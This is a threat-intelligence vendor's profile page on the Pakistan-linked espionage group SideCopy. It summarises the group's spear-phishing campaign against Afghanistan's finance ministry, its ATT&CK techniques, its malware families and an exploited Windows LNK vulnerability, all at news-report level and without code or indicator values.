Skip to main content
Meet us at Black Hat USA 2026— Las Vegas, August 1–6Book a Meeting
Mallory
Back to threat actors
17 malware familiesExploits CVEs in the wild

SideCopy

Also known astag_140

SideCopy is a Pakistan-linked threat actor, described in the content as likely aligned with or an element of the Pakistani government and operating under or alongside the broader Transparent Tribe / APT36 umbrella. Known aliases in the provided content include SideCopy and TAG_140. The group is associated with cyber espionage activity across South Asia and is specifically noted for targeting government, military, and diplomatic entities, as well as sectors such as railways and oil. Recent reporting in the content attributes with medium-to-high confidence a spear-phishing campaign dubbed Operation XENOFISCAL to SideCopy, targeting Afghanistan’s Ministry of Finance, provincial revenue and finance directorates, and other Pashto-speaking Afghan government officials. In the Afghanistan campaign, SideCopy used tailored spear-phishing emails carrying ZIP archives containing malicious LNK files disguised as PDFs and named in Pashto. Execution of the LNK launched mshta.exe to retrieve a remote HTA or PHP-hosted payload from a compromised Afghan domain, followed by obfuscated JavaScript and multi-stage in-memory loading that ultimately deployed a customized Xeno RAT / XenoRAT 1.8.7 payload. The campaign used decoy Afghan Ministry of Finance staff directories, indicating prior reconnaissance, and established persistence through Windows Registry Run keys while masquerading as Microsoft Edge; some reporting in the content also notes scheduled-task persistence. The group used compromised Afghan government or education infrastructure to host payloads and blend malicious traffic with legitimate state activity, while command-and-control infrastructure was hosted separately on European or Bulgaria-linked infrastructure. The content also notes SideCopy’s use of compromised domains to host malicious payloads, spear-phishing emails with malicious HTA attachments, malicious embedded archive files, and a legitimate DLL filename such as Duser.dll to disguise a remote access tool. Beyond delivery and persistence tradecraft, the content states that SideCopy has performed host discovery including identifying the IP address, OS version, and country location of compromised hosts. The group is also described as using multiple malware families, including Xeno RAT, Spark RAT, CurlBack RAT, and FalseCub in related reporting, and as continuously evolving tactics to evade detection. The content further references SideCopy as a subgroup of APT36 / Transparent Tribe and notes its involvement in broader Pakistan-aligned cyber activity directed at neighboring countries, including India and Afghanistan.

Share:
Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

Start free trial
MITRE ATT&CK

Tradecraft

49 distinct techniques observed across reporting, grouped by tactic. Hover any cell for the evidence excerpt; click through for MITRE's full description.

12 of 15 tactics68 techniques×N= number of intelligence reports citing this technique
MITRE ATT&CK
TA0043
Reconnaissance
3 techniques
T1589
Gather Victim Identity Information
T1592
Gather Victim Host Information
T1598
Phishing for Information
TA0042
Resource Development
4 techniques
T1583
Acquire Infrastructure
T1583.001
Domains
T1584×3
Compromise Infrastructure
T1587
Develop Capabilities
T1587.001
Malware
T1608
Stage Capabilities
T1608.001
Upload Malware
T1608.002
Upload Tool
TA0001
Initial Access
2 techniques
T1190
Exploit Public-Facing Application
T1566
Phishing
T1566.001×11
Spearphishing Attachment
TA0002
Execution
4 techniques
T1053
Scheduled Task/Job
T1053.005×2
Scheduled Task
T1059
Command and Scripting Interpreter
T1059.001
PowerShell
T1059.003
Windows Command Shell
T1059.005
Visual Basic
T1059.007×5
JavaScript
T1106
Native API
T1204
User Execution
T1204.002×9
Malicious File
TA0003
Persistence
2 techniques
T1053
Scheduled Task/Job
T1053.005×2
Scheduled Task
T1547
Boot or Logon Autostart Execution
T1547.001×5
Registry Run Keys / Startup Folder
TA0004
Privilege Escalation
2 techniques
T1053
Scheduled Task/Job
T1053.005×2
Scheduled Task
T1547
Boot or Logon Autostart Execution
T1547.001×5
Registry Run Keys / Startup Folder
TA0005
Stealth
8 techniques
T1027×2
Obfuscated Files or Information
T1027.011
Fileless Storage
T1036×5
Masquerading
T1140
Deobfuscate/Decode Files or Information
T1218
System Binary Proxy Execution
T1218.005×7
Mshta
T1480
Execution Guardrails
T1480.002
Mutual Exclusion
T1497
Virtualization/Sandbox Evasion
T1497.001×2
System Checks
T1564
Hide Artifacts
T1564.006
Run Virtual Instance
T1620×2
Reflective Code Loading
TA0006
Credential Access
1 technique
T1056
Input Capture
T1056.001×2
Keylogging
TA0007
Discovery
5 techniques
T1012
Query Registry
T1016×4
System Network Configuration Discovery
T1217
Browser Information Discovery
T1497
Virtualization/Sandbox Evasion
T1497.001×2
System Checks
T1518×2
Software Discovery
TA0009
Collection
5 techniques
T1056
Input Capture
T1056.001×2
Keylogging
T1113×2
Screen Capture
T1115
Clipboard Data
T1123
Audio Capture
T1125
Video Capture
TA0011
Command and Control
6 techniques
T1071×3
Application Layer Protocol
T1071.001×2
Web Protocols
T1090
Proxy
T1090.002
External Proxy
T1105
Ingress Tool Transfer
T1219
Remote Access Tools
T1573
Encrypted Channel
T1665
Hide Infrastructure
TA0040
Impact
1 technique
T1498
Network Denial of Service
ARSENAL

Associated malware families

17 malware families attributed to this actor across reporting.

FamilyContextEvidenceLast seen
Geta RATOne active campaign targeted Windows systems using phishing emails that delivered LNK and HTA files. These files ultimately deployed GETA RAT, a .NET-based remote access trojan frequently linked to the SideCopy cluster.4Mar 18, 2026
Xeno RATThe malware these steps were in service of, Xeno RAT, is an open source (OSS) remote stealer, customized in this case with a hardcoded command-and-control (C2) domain hosted by a bulletproof service in Bulgaria.4Jun 4, 2026
XenoRATSeqrite Labs identified a sophisticated SideCopy XenoRAT malware attack focused directly on government networks.4Jun 3, 2026
Ares RAT"Running parallel to this Windows-focused campaign is a Linux variant... to drop a Python-based Ares RAT..."2Mar 8, 2026
DRAT"The deployment of DRAT V2 reflects TAG-140's ongoing refinement of its remote access tooling, transitioning from a .NET-based version of DRAT to a new Delphi-compiled variant"2Mar 18, 2026

12 additional families tracked in Mallory.

WEAPONIZED

Associated vulnerabilities

1 CVE this actor has used in observed campaigns. 1 of them exploited in the wild.

CVE-2025-9491Microsoft Windows LNK File UI Misrepresentation Remote Code Execution VulnerabilityIn the wildEvidence2

This detection identifies instances where Windows Explorer.exe spawns PowerShell or cmd.exe processes, particularly focusing on executions initiated by LNK files. This behavior is associated with the ZDI-CAN-25373 Windows shortcut zero-day vulnerability, where specially crafted LNK files are used to trigger malicious code execution through cmd.exe or powershell.exe. This technique has been actively exploited by multiple APT groups in targeted attacks through both HTTP and SMB delivery methods.

IOCS

Observables

59 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. View more in app.

59 IOCsView more in app

IOC values are gated. View more in Mallory for domains, IPs, hashes, and other artifacts, or pipe them straight into your SIEM.

ACTIVITY FEED

Recent activity

20 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

20 SOURCESView more in app
dark readingNews
Jun 4, 2026
Pakistan Spies on Afghan Finance Ministry With Xeno RAT

Espionage campaign targeting Afghanistan's government finance apparatus, including the Ministry of Finance and provincial government employees, using spear-phishing and Xeno RAT.

Read more
security online infoNews
Jun 3, 2026
SideCopy XenoRAT Malware Attack Targets Afghanistan

Conducting a targeted cyber espionage campaign against Afghan government networks, specifically the Afghan Ministry of Finance, using spear-phishing with localized Pashto-language lures to deliver a fileless XenoRAT infection chain and establish persistent remote access.

Read more
scworldNews
Jun 2, 2026
SideCopy group targets Afghanistan’s Ministry of Finance with Xeno RAT | brief | SC Media

Conducting a spear-phishing campaign against Afghanistan government finance entities and Pashto-speaking officials using Xeno RAT for remote access, persistence, monitoring, and data exfiltration.

Read more
the hacker newsNews
Jun 2, 2026
Pakistan-Linked SideCopy Targets Afghanistan Finance Ministry with Xeno RAT

Conducting a spear-phishing campaign dubbed Operation XENOFISCAL targeting Afghanistan's Ministry of Finance, provincial revenue and finance directorates, Pashto-speaking government officials, and provincial-level government employees; also previously attributed to attacks targeting sectors in India.

Read more
+167 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.
Start free trial
Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping49

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal17

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs1

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables59

Domains, IPs, and hashes tied to this actor, refreshed continuously.